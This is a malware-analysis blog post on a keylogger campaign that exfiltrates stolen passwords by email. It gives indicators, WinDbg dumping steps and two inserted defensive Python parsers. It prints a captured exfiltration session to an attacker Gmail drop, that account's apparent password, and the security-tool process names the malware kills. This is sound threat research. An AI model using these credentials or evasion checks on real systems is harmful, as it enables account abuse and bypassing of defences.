
NightHunter data theft campaign building big data threats

Posted on July 9th, 2014 by Nick Bilogorskiy

Cyphort Labs has discovered an extensive data theft campaign. It involves several different keylogger families, including Predator Pain, Limitless, Spyrex and others. Their unifying feature is that they all use SMTP (email) for data exfiltration. Email is to social networking what snail mail is to email: older and often overlooked, which makes it a stealthier channel for data theft. We therefore named the campaign NightHunter.

NightHunter is very aggressive at stealing users' passwords and sending them home. With a trove of stolen credentials this large, the actors could apply big-data analytics to enable new attacks: extortion, credit card or bank fraud, theft of state secrets or corporate espionage.

Our investigation started with a sample delivered through a phishing email. It is a .NET binary; when executed, it steals the user's credentials and sends them to a remote email server. To most existing "advanced" security products this looks like a naive technique. Starting from that sample we found additional similar samples and examined the data they exfiltrated to the remote servers.

The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals, charities and other enterprises.

Common delivery mechanism:

These samples are delivered mostly through phishing emails carrying DOC/ZIP/RAR attachments; opening a malicious document with scripting (macros) enabled infects the machine. The phishing emails are mostly aimed at personnel in finance, sales and HR departments, and the actors sometimes pose as goods resale agents. We have also seen cases where the malware was bundled with fake IDM/7-Zip installers. Most of these samples use keylogger tools to sniff data from the victim.

Most common phishing email subjects/attachment names:

  1. WireSlip
  2. Jobs List
  3. PO
  4. Reconfirm Pls
  5. Purchase Order
  6. Payment Slip
  7. Order
  8. Inquiry
  9. Remittance Payment Slip

Types of stolen credentials:

  1. Google
  2. Facebook
  3. Dropbox
  4. Yahoo
  5. Hotmail
  6. Amazon
  7. Skype
  8. LinkedIn
  9. Banks
  10. Rediff

Victim industries:

  1. Oil industry
  2. Charities
  3. Educational Institutes
  4. Hospitals
  5. Departmental Stores
  6. Auditors
  7. Export/Import Companies.
  8. Insurance Companies
  9. TV Network
  10. Trading Companies

List of keylogger malware used:

  1. Limitless logger lite (http://limitlessproducts.org/)
  2. Predator Pain
  3. Keylogger Logları (SlloTBan)
  4. Spyrex
  5. FEDERIKO's Logger
  6. Unknown Logger Public
  7. Aux Logger
  8. Neptune
  9. Clyde Logger
  10. Ultimate Logger
  11. MY Ultimate Jobe
  12. Syslogger
  13. Syndicate Logger (http://syndicateproducts.org)

We see the Limitless keylogger in many places. Next to Limitless, Predator Pain is popular with these actors; given its low cost, easy setup, the quality of its builder and the features it supports, we see increasing interest in it. Limitless Logger, although now closed down, was used heavily.

Most of the keyloggers used provide the following features:

  – E-Mail/PHP/FTP upload
  – Obfuscation
  – Spoof extension and change icon
  – Clear browser data
  – Fake error message
  – Capture screenshot
  – Disable many programs
  – Various spreading mechanisms
  – File downloader
  – Block various websites
  – Self-delete

Data stealing:

  – Bitcoin wallets
  – Password managers
  – Firefox/Google Chrome/IE/Safari/Opera
  – Outlook
  – Pidgin/Trillian/Paltalk/AIM/IMVU
  – Various games and game bots
  – FileZilla/FlashFXP/CoreFTP/SmartFTP/FTP Commander

One of the samples (SHA-256: f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210) even printed its activity details to the console.

List of email servers and the number of samples using each:

Email server                          Samples   First seen    Last seen
smtp.googlemail.com/smtp.gmail.com    300k      2009          today
smtp.mail.ru                          228       2010-10-08    2014-06-13
smtp.live.com                         151       2010-08-24    2014-06-12
mx1.3owl.com                          82        2012-09-10    2014-06-05
smtp.mail.com                         42        2011-04-20    2014-06-12
smtp.yandex.com/smtp.yandex.ru        39        2010-12-20    2014-06-12
smtp.turkceventrilo.com               38        2014-04-02    2014-06-04
smtp.mail.yahoo.com                   25        2013-02-15    2014-06-13
mail.drmike.com.de                    31        2014-04-06    2014-05-29
smtp.aol.com                          13        2010-10-27    2014-06-06
smtp.comcast.net                      18        2013-05-31    2014-06-12
smtp-mail.outlook.com                 1         2014-05-23    -
smtp.list.ru                          1         2014-06-09    -
smtp.hanco-ltd.biz                    10        2014-04-04    2014-06-10
mail.ieindia.org                      7         2014-04-29    2014-06-10
mail.npcuae.com                       1         2014-06-08    -
smtp.bilatraders.com                  1         2014-06-04    -
mail.persian-trading.com              5         2014-05-25    2014-06-06
smtp.poczta.onet.pl                   2         2012-06-02    2014-06-09
relay.skynet.be                       1         2014-06-04    -
smtp.interia.pl                       1         2014-06-06    -
mx.freenet.de                         1         2014-06-05    -
cloud73.dotcanada.com                 2         2014-04-29    2014-05-30
smtp.bk.ru                            5         2014-04-21    2014-05-26
master.torguard.tg                    3         2014-05-16    2014-05-23
poczta.o2.pl                          4         2014-03-21    2014-05-31
smtp.web.de                           2         2011-07-03    2014-04-11
mail.snookiezinc.com.de               1         2014-03-18    -
mail.atbinco.com                      2         2014-05-09    -
smtps.bol.com.br                      2         2014-04-15    2014-05-26
mail.glintcosmetics.com               2         2014-04-25    2014-06-11


Gmail seems to be the most popular email server used by the criminals to "park" victim data in recent times. The larger number of Gmail-based samples probably has two causes. First, Gmail is popular and many security products effectively whitelist Google/Gmail traffic, so the exfiltration email hides easily in the volume of legitimate mail sent to Gmail. Second, Gmail imposes restrictions such as a daily sending limit per account, so the actors have to keep building new malware with new accounts.

The number of samples using the other email servers is very low. We believe some of these servers were hacked to create an email account, and in some cases the actors set up their own email server. For example, the email server of The Institution of Engineers (India) (ieindia.org) was hacked to create two accounts, which were used to park victim data mostly from India. Some of the samples that use private email servers were active for only a few weeks.

Most of the builder tools offer several options to exfiltrate data from the victim machine: email, FTP and PHP upload. Looking at the patterns, most of these actors started with PHP upload and then moved to email; recent samples show most actors using email only. Very few samples use more than one exfiltration method, such as FTP and email together.


Samples using mx1.3owl.com, by first seen date, infection count and keylogger:

First seen   Infections   Keylogger
6/5/2014     2            Predator Pain
6/4/2014     31           Predator Pain
6/4/2014     47           Predator Pain
6/3/2014     10           Predator Pain
6/3/2014     15           Predator Pain
6/3/2014     33           Predator Pain
6/2/2014     2            Predator Pain
6/2/2014     50           Predator Pain
6/2/2014     2            Predator Pain
6/1/2014     33           Predator Pain
5/30/2014    7            Predator Pain
5/25/2014    44           Predator Pain
5/20/2014    6            Predator Pain
5/17/2014    5            Mr. Clyde Logger and Predator
5/15/2014    26           -
5/12/2014    5            Mr. Clyde Logger and Predator
5/11/2014    39           Predator Pain
5/8/2014     59           Predator Pain
5/7/2014     -            -
5/6/2014     6            Predator Pain
5/2/2014     20           Predator Pain, Limitless Logger
4/24/2014    37           Predator Pain
4/23/2014    57           Predator Pain, Limitless Logger
4/22/2014    57           Predator Pain, Limitless Logger
4/22/2014    57           Predator Pain, Limitless Logger, MY Ultimate Jobe
4/17/2014    57           Predator Pain, Limitless Logger
4/17/2014    57           Predator Pain, Limitless Logger, MY Ultimate Jobe
4/17/2014    14           Predator Pain
4/16/2014    -            -
4/15/2014    1            Predator Pain
4/10/2014    73           Predator Pain, Limitless Logger
4/9/2014     73           Predator Pain, Limitless Logger / Limitless Logger
4/5/2014     57           Predator Pain, Limitless Logger / Limitless Logger / Predator Pain, Limitless Logger
4/3/2014     42           -
3/27/2014    73           -
2/18/2014    1            Predator Pain
1/28/2014    57           Predator Pain, Limitless Logger, MY Ultimate Jobe


The actors behind 35 of the 82 samples using mx1.3owl.com follow similar techniques when registering their domains, and the registrant identity is hidden from the analyst.

List of samples (MD5) we looked into that are related to mx1.3owl.com:

62F3DF70D746C898A3A5ACAD1EB6117F

5DAB1479F63376739DFE0F8140F3263E

0C25431D2B13C99AFC0DE7338E9A3ACE

BDC5A619BC2D96616D900DFEBC2D21E7

845EFE43B05A7334B0AE8CB39C6AA4E5

3164A660B54EBE994B467D765465D23C

09423D5E22289F0F8E31FE4FC2DA0A25

416CE138B5F02F00253FC08989A9CD12

DE59FB78752DE040010EDA63667C26CA

CEC37293C2ADF3C9EECA7EE14979BDAD

26D13E5412D282DA91E4053D92B34271

3CE8C9743D9F523009CA84CD3B12B1B8

71AC33835389B800FE5BDB69786A62B8

3831B1FCE2B1CDC662262D389529A298

8117AAA51EE22F13E817F67E7A816F48

28F718CCE2D22F61108B580746CFD810

736A752D2B0B96741213404177DBD8F6

DEFB1E6E42EDC46FA9630CDF42C347F9

5EFF0A000B0B63D67BD3F9BBFB8991D0

207A9A92C697E83B21FC44E4DF0247AD

7D9F321A673266B4BDE3F48CE132A81E

D0D13CDAB7EE6DC22A52FBB0A2FA5F16

31D0DD3ADBE378F8BF3D13FC0BF69D51

C475E64740710B398F458710E7CBF3FD

F4E7CC408B9902A92181BF46282C46DD

0AA6E7204A3DBA4EBE6F81331FF9EF3B

9716665CB4F603C4D1CA96D7CC7A555C

0E4FA8AB9CF7C64714C436735D68E1F0

B699A3FE2B531139FAB267689B3CEF14

B7103ED3D263578FA26E06C9E6ADBD21

A514FCBDF47C0829843A1C03D1061F28

9350F7B4513198F86987F36A8D400D34

AD9A3311486DF3B7B457779EA486BC5D

9A285873E25F43085D9DE5FCA4D898D5

77CF51DA449598A43CF030A7EC9F223E

4BD63A33567A9EAF80D0E0730DE6AB0A

D1683408FEFA12BB93FC15CE2DEDD7C7

7AD0EABC5B9D6F6B1A7BE35B75F68681

mail.ieindia.org:

All the samples related to this email server were active for only a few weeks, and they target people in India. The actors used Limitless Logger to extract information from the victims. We believe the actors hacked into the institution's email server and created two email accounts there to park their data. The victims come from different industries.

SHA-256                                                             First seen
70b0e2fb1e54d16f96d11685c81071361afb66523c3c81b054344c21df1bd6ec    2014-06-10
db3b52afd523055cabcc0df3c9f0eeced65e627fd2f7e2b9d4d8e0f5c6141f42    2014-06-03
8dfdd1f019c2b4c3d4bc9fb6a8e15b7a4cca916a5540c7dae65f83c4ec60b2e7    2014-06-02
9a71df6f73875488754583f53e6caf9c654526fc55c09c4d4b57003788b844c4    2014-05-09
aea5e5650fb857b1675fe68eb7f102e7695322a70defce79f59a72f3f34ea6c4    2014-05-29
75b4e7f2917dd18ce7d2d4a9238b5b8072b997ff2634444d0a43b69acc1f14ea    2014-05-28
584e6f7326ee93f1f03cca1014263bcef007fcfa6d527a77cb040b20e165bb4a    2014-04-29


Manual Analysis

Most of the samples we manually analyzed use a lot of obfuscation to delay analysis. We will look at the static analysis of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and of related samples.

Anti-analysis techniques used:

  1. Non-printable characters as class and variable names in the code.
  2. Assembly.Load() to load a different assembly from a byte array in memory.
  3. Strings in the code encoded with various methods (we found almost 10 different ones).
  4. Security product detection code.
  5. Debugger detection code.

We started looking at the binary with various .NET disassemblers; most of them failed on most of these binaries. Using ILSpy we were able to analyze it: internally it decodes another assembly from its resource section and loads it.

We decided to dump the second stage with WinDbg. The first-stage binary generally has no debugger or security-product detection code, but the second stage does. Breaking on System.AppDomain.Load(Byte[]) with SOS catches the decoded assembly as the rawAssembly argument, which can then be written to disk:

0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> g
0:000> .loadby sos mscorwks
0:000> !bpmd mscorlib.dll System.AppDomain.Load
0:000> g
0:000> !clrstack -a
OS Thread Id: 0xc64 (0)
ESP       EIP
0045ed38 67f0736c System.AppDomain.Load(Byte[])
    PARAMETERS:
        this = 0x02851268
        rawAssembly = 0x02879c04
    LOCALS:
        <no data>

0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)
    PARAMETERS:
        this = <no data>
        sender = <no data>
        e = <no data>
    LOCALS:
        <no data>
        0x0045ed3c = 0x02879c04

0:000> !da 0x02879c04
Name: System.Byte[]
MethodTable: 67ac37b8
EEClass: 6787eb8c
Size: 32268(0x7e0c) bytes
Array: Rank 1, Number of elements 32256, Type Byte
Element Methodtable: 67ac3868
[0] 02879c0c
[32255] 02881a0b
0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255
Writing 7dff bytes ..............
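Before opening a dump like secondstage.bin in ILSpy it pays to confirm that the buffer really is a managed PE and that the dump starts at element [0] rather than at the array object header. The following Python checker is an added example, not Cyphort's tooling: it parses the DOS/PE/COFF headers, locates data directory entry 14 (the CLR runtime header, non-empty only for .NET images) and can carve the image out of a dump that starts early. The minimal PE it builds for itself is a constructed test input, not a real sample and not a loadable program.

```python
import struct
import sys

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # data-directory slot of the CLR runtime header
MACHINES = {0x14C: "i386", 0x8664: "x64"}


def inspect_dump(buf):
    """Parse just enough of a dumped buffer to say: is it a PE, which bitness, is it managed."""
    info = {"is_pe": False, "managed": False, "machine": None, "sections": 0, "clr_rva": 0}
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf) or buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    info["is_pe"] = True
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    info["machine"] = MACHINES.get(machine, hex(machine))
    info["sections"] = nsect
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    if opt + 2 > len(buf):
        return info
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == 0x10B:                       # PE32: NumberOfRvaAndSizes at +0x5C, directories at +0x60
        ndirs_off, dirs_off = opt + 0x5C, opt + 0x60
    elif magic == 0x20B:                     # PE32+: at +0x6C and +0x70
        ndirs_off, dirs_off = opt + 0x6C, opt + 0x70
    else:
        return info
    if ndirs_off + 4 > len(buf):
        return info
    ndirs = struct.unpack_from("<I", buf, ndirs_off)[0]
    entry = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and entry + 8 <= len(buf):
        rva, size = struct.unpack_from("<II", buf, entry)
        info["clr_rva"] = rva
        info["managed"] = rva != 0 and size != 0   # a non-empty CLR header marks a .NET image
    return info


def carve_pe(buf):
    """Offset of the first valid PE header in buf, or -1; handles dumps that start before element [0]."""
    pos = buf.find(b"MZ")
    while pos != -1:
        if inspect_dump(buf[pos:])["is_pe"]:
            return pos
        pos = buf.find(b"MZ", pos + 1)
    return -1


def build_minimal_pe(managed=True, pe32plus=False):
    """Constructed test input: DOS stub, PE signature, COFF and optional headers, one empty section.
    It is the smallest thing inspect_dump accepts, not a loadable image and not a real sample."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)        # e_lfanew -> 0x40
    magic, dirs_off, machine = (0x20B, 0x70, 0x8664) if pe32plus else (0x10B, 0x60, 0x14C)
    dirs = [(0, 0)] * 16
    if managed:
        dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2008, 0x48)      # typical CLR header RVA/size
    opt = struct.pack("<H", magic)
    opt += b"\0" * (dirs_off - 4 - len(opt))                              # pad up to NumberOfRvaAndSizes
    opt += struct.pack("<I", len(dirs))
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, len(opt), 0x0102)
    section = b".text\0\0\0" + b"\0" * 32                                # one 40-byte section header
    return dos + b"PE\0\0" + coff + opt + section


if __name__ == "__main__":
    # e.g. python inspect_dump.py c:\tmp\secondstage.bin ; without a path, inspect the constructed PE
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else b"\x90" * 17 + build_minimal_pe()
    off = carve_pe(data)
    print("PE header at offset %d" % off if off >= 0 else "no PE header found")
    if off >= 0:
        print(inspect_dump(data[off:]))
```

If carve_pe reports an offset other than 0, the .writemem start address was not the address of element [0]; re-dump from the address !da prints for [0], or trim the file at the reported offset before loading it into a decompiler.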

 

The second-stage binary is again obfuscated and uses many identifiers made of non-printable characters, so breakpoints cannot be set on its methods by name in WinDbg. We therefore switched to dynamic analysis. The binary persists in the system through an autorun registry modification. It first connects to a remote server (which one depends on the binary) to find the victim's external IP address and then sends an email to the remote mail server.

It connects to the remote email server (mx1.3owl.com) and sends an email with the victim information. The sample was built with the Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.

Let's look at other similar binaries that include the credentials in plain text in the original sample itself.

SHA-256: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d

It hides the email credentials at the end of the file.

 

 

Some binaries look for a few security products installed on the machine. If they find any, they hide their own window and also kill the security product.

Every one of these checks looks for a particular process name, so an analysis tool whose executable has been renamed is not detected:

AntiKeyscrambler()  -> keyscrambler
AntiWireshark()     -> wireshark
AntiAnubis()        -> anubis
AntiMalwarebytes()  -> mbam
AntiKaspersky()     -> avp
AntiOllydbg()       -> ollydbg
AntiOutpost()       -> outpost
AntiNorman()        -> npfmsg
AntiBitDefender()   -> bdagent
AntiNOD32()         -> egui

 

We used WinDbg to dump the credentials for some of the samples that do not detect a debugger, by breaking on the System.Net.NetworkCredential constructor and dumping its string arguments:

0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> sxe ld:System.Windows.Forms.dll
0:000> g
ModLoad: 00000000`6f680000 00000000`6fb4e000   System.Windows.Forms.dll
ntdll!ZwMapViewOfSection+0xa:
00000000`77a6153a c3              ret
0:000> .loadby sos mscorwks
0:000> .symfix
0:000> ld system_ni
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
Found 4 methods...
Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]
Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]
0:000> g
Breakpoint 1 hit
System_ni+0x236b10:
000007fe`ea3d6b10 53              push    rbx
0:000> !dumpobj -nofields rdx
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 66(0x42) bytes
 (C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: alinsterpu@gmail.com
0:000> !dumpobj -nofields r8
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 46(0x2e) bytes
 (C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: hainerosii

 

Most of the binaries use TCP/587 (mail submission) to send email to the remote server; some binaries associated with mx1.3owl.com use TCP/2525. We retrieved most of the credentials, including the Gmail ones, through dynamic analysis. Gmail requires an encrypted channel (it offers AUTH only after STARTTLS), so the credentials are not visible on the wire; since the number of samples using Gmail is high, we set up a man-in-the-middle of the Gmail traffic in our malware lab. The captured session below (C->S is client to server, S->C server to client) shows the client upgrading to TLS, authenticating with AUTH LOGIN and mailing the logs to its own address; the two base64 values in the AUTH exchange decode to the same username and password recovered with WinDbg above:

S->C 53 b'220 mx.google.com ESMTP ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 16 b'EHLO test-PC\r\n'
S->C 137 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 10 b'STARTTLS\r\n'
S->C 30 b'220 2.0.0 Ready to start TLS\r\n'
Wrapping sockets.
C->S 16 b'EHLO test-PC\r\n'
S->C 178 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 41 b'AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 18 b'aGFpbmVyb3NpaQ==\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 34 b'MAIL FROM:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.0 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 32 b'RCPT TO:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.5 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 6 b'DATA\r\n'
S->C 43 b'354  Go ahead ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 228 b'MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n'
C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'
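Pulling the drop-box account out of such a capture by hand is error-prone once there are hundreds of samples. The Python script below is an added example, not Cyphort's code: it parses a capture in the C->S / S->C format above, follows the AUTH LOGIN prompt sequence (and AUTH PLAIN, which the server also advertises), decodes the base64 values, and records the envelope and headers so that the tell-tale traits of a keylogger "call home" (self-addressed mail, a subject like "New keylogger logs!") can be flagged. The embedded capture is the Gmail session shown above, re-typed; the exfil_indicators heuristics are the example's own, not something the post describes.

```python
import ast
import base64
import re

# Capture format used in the post: direction, byte count, Python bytes literal.
LINE_RE = re.compile(r"^(?P<dir>[CS]->[CS]) (?P<n>\d+) (?P<payload>b'.*')$")

# AUTH LOGIN prompts are the base64 of "Username:" and "Password:".
PROMPT_PASS = base64.b64encode(b"Password:").decode()   # UGFzc3dvcmQ6

# Constructed input: the Gmail session shown above, re-typed line for line.
CAPTURE = r"""
S->C 53 b'220 mx.google.com ESMTP ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 16 b'EHLO test-PC\r\n'
S->C 137 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 10 b'STARTTLS\r\n'
S->C 30 b'220 2.0.0 Ready to start TLS\r\n'
Wrapping sockets.
C->S 16 b'EHLO test-PC\r\n'
S->C 178 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 41 b'AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 18 b'aGFpbmVyb3NpaQ==\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 34 b'MAIL FROM:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.0 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 32 b'RCPT TO:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.5 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 6 b'DATA\r\n'
S->C 43 b'354  Go ahead ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 228 b'MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n'
C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'
"""


def parse_transcript(text):
    """Yield (direction, bytes) for each capture line; lines in another format are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            yield m.group("dir"), ast.literal_eval(m.group("payload"))


def _b64(value):
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def _take_plain(session, value):
    """AUTH PLAIN carries authzid NUL authcid NUL password in one base64 blob (RFC 4616)."""
    try:
        parts = base64.b64decode(value, validate=True).split(b"\0")
    except ValueError:
        return
    if len(parts) == 3:
        session["username"] = parts[1].decode("utf-8", "replace")
        session["password"] = parts[2].decode("utf-8", "replace")


def extract_session(text):
    """Walk one SMTP submission and recover server, STARTTLS use, credentials, envelope and headers."""
    s = {"server": None, "starttls": False, "auth": None, "username": None, "password": None,
         "mail_from": None, "rcpt_to": [], "headers": {}, "body": []}
    pending = None   # "username" or "password": the next client line answers an AUTH LOGIN prompt
    phase = "cmd"    # "cmd" -> "hdr" (after 354) -> "body" (after the blank header terminator)
    for direction, payload in parse_transcript(text):
        lines = payload.split(b"\r\n")
        if lines and lines[-1] == b"":
            lines.pop()                          # drop the empty tail left by a trailing CRLF
        for raw in lines:
            line = raw.decode("latin-1")
            if direction == "S->C":
                if line.startswith("220 ") and s["server"] is None:
                    s["server"] = line.split()[1]
                elif line.startswith("334 "):    # server asks for the next AUTH value
                    pending = "password" if line[4:] == PROMPT_PASS else "username"
                elif line.startswith("354"):
                    phase = "hdr"
                continue
            if phase == "hdr":
                if line == "":
                    phase = "body"
                elif ":" in line:
                    k, v = line.split(":", 1)
                    s["headers"][k.strip()] = v.strip()
                continue
            if phase == "body":
                if line == ".":
                    phase = "cmd"
                else:
                    s["body"].append(line)
                continue
            if pending:                          # client reply to a 334 prompt, not a command
                if s["auth"] == "PLAIN":
                    _take_plain(s, line)
                else:
                    s[pending] = _b64(line)
                pending = None
                continue
            up = line.upper()
            parts = line.split()
            if up == "STARTTLS":
                s["starttls"] = True
            elif up.startswith("AUTH LOGIN"):
                s["auth"] = "LOGIN"
                if len(parts) == 3:              # initial response carries the username
                    s["username"] = _b64(parts[2])
            elif up.startswith("AUTH PLAIN"):
                s["auth"] = "PLAIN"
                if len(parts) == 3:
                    _take_plain(s, parts[2])
            elif up.startswith("MAIL FROM:"):
                m = re.search(r"<([^>]*)>", line)
                s["mail_from"] = m.group(1) if m else line[10:].strip()
            elif up.startswith("RCPT TO:"):
                m = re.search(r"<([^>]*)>", line)
                s["rcpt_to"].append(m.group(1) if m else line[8:].strip())
    return s


def exfil_indicators(s):
    """Traits of a keylogger drop-box submission, as seen in the capture above."""
    hits = []
    if s["mail_from"] and s["rcpt_to"] == [s["mail_from"]]:
        hits.append("self-addressed: the account mails its own mailbox")
    subject = s["headers"].get("Subject", "")
    if re.search(r"keylog|logs\b|passw", subject, re.I):
        hits.append("suspicious subject: " + subject)
    if s["username"] and s["password"]:
        hits.append("drop-box credentials recovered: %s / %s" % (s["username"], s["password"]))
    return hits


if __name__ == "__main__":
    session = extract_session(CAPTURE)
    for key in ("server", "starttls", "auth", "username", "password", "mail_from", "rcpt_to"):
        print("%-10s %s" % (key, session[key]))
    print("Subject:   %s" % session["headers"].get("Subject"))
    for hit in exfil_indicators(session):
        print("  !", hit)
```

The same parser works on a TCP/2525 session to mx1.3owl.com taken straight from a packet capture, since those samples do not negotiate TLS; for Gmail it needs the decrypted stream from the MITM proxy, as here.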

 

One sample we analyzed (SHA-256: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both email and FTP to exfiltrate data from the user's machine.


Most of the samples use code-level obfuscation to delay analysis. In the end we found 10 different decoding/decryption routines for strings across the set, which is consistent with the samples being produced by the same family of builder tools.

NightHunter is unusual in that it tries to fly under the radar with its email exfiltration while being very aggressive at collecting all sorts of data and credentials from users: passwords, screenshots and more.